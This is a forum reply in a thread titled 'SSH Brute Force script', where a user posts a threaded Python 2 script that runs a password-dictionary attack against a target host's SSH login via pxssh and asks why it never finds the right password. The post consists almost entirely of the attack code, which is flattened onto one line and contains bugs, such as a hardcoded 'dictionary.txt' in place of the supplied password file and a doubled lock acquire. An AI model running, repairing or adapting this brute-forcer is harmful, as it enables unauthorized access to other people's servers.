Login Register






SSH Brute Force script filter_list
Author
Message
RE: SSH Brute Force script #5
I tried that and it know goes through all the passwords but doesn't find the password that it should be, just prints all the passwords out sequentially but doesn't find the password:

Code:
import pxssh import optparse import time import fileinput from threading import * maxConnections = 5 connection_lock = BoundedSemaphore(value=maxConnections) Found = False Fails = 0 def connect(host, user, password, release): global Found global Fails try: s = pxssh.pxssh() s.login(host, user, password) print '[+] Password Found: ' + password Found = True except Exception, e: if 'read-nonblocking' in str(e): Fails +=1 time.sleep(5) connect(host, user, password, False) elif 'synchronize with original prompt' in str(e): time.sleep(1) connect(host, user, password, False) finally: if release: connection_lock.release() def main(): parser = optparse.OptionParser('usage%prog '+\ '-H <target host> -u <user> -F <password list>') parser.add_option('-H', dest='tgtHost', type='string',\ help='Specify target host') parser.add_option('-F', dest='passwdFile', type='string',\ help='Specify password file') parser.add_option('-u', dest='user', type='string',\ help='Specify the user') (options, args) = parser.parse_args() host = options.tgtHost passwdFile = options.passwdFile user = options.user if host == None or passwdFile == None or user == None: print parser.usage exit(0) fn = open(passwdFile, 'r') for line in fileinput.input(['dictionary.txt']): connection_lock.acquire() password = line.strip('\r').strip('\n') print "[-] testing: "+str(password) if Found: print "[*] Exiting: Password found" exit(0) if Fails > 5: print "[!] Exiting: Too Many Socket Timeouts" exit(0) connection_lock.acquire() print "[-] testing: "+str(password) t = Thread(target=connect, args=(host, user, password, True)) child = t.start() if __name__ == '__main__': main()

Reply





Messages In This Thread
SSH Brute Force script - by theRandy - 10-13-2013, 03:50 AM